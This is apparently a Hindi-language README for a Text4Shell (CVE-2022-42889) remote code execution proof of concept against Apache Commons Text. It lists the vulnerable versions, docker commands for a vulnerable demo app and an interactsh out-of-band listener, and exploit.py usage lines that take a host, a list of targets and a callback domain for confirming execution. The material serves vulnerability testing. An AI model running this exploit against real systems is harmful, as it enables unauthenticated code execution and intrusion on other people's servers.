
CVE-2022-42889 - Text4Shell एक्सप्लॉइट
यह उस भेद्यता का प्रूफ ऑफ कॉन्सेप्ट है जो Apache Commons Text [CVE-2022-42889] में मौजूद है।
संवेदनशील संस्करण : 1.5.0 से (शामिल नहीं) 1.10.0 तक
इस भेद्यता के सफल शोषण से एक अनप्रमाणित हमलावर संवेदनशील एसेट पर मनमाना कोड निष्पादित कर सकता है।
@securekomodo द्वारा विकसित एप्लिकेशन, यहाँ संलग्न है।
इस एप्लिकेशन को docker-registry से भी लोड किया जा सकता है।
docker run -p 8080:8080 gokul2/text4shell-poc:latest
एप्लिकेशन अब localhost:8080 पर उपलब्ध होगा।
मनमाना कमांड निष्पादन को सत्यापित करने के लिए, हम interactsh का उपयोग करते हैं, जो @projectdiscovery द्वारा OOB इंटरैक्शन कैप्चर करने का एक टूल है।
वास्तविक एक्सप्लॉइट निष्पादित करने से पहले interactsh-client सेट करें।
docker run projectdiscovery/interactsh-client:latest
एप्लिकेशन शुरू करने के बाद सूचीबद्ध डोमेन पर ध्यान दें।
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
एक्सप्लॉइट को मान्य करने के लिए interactsh-client में लॉग देखें।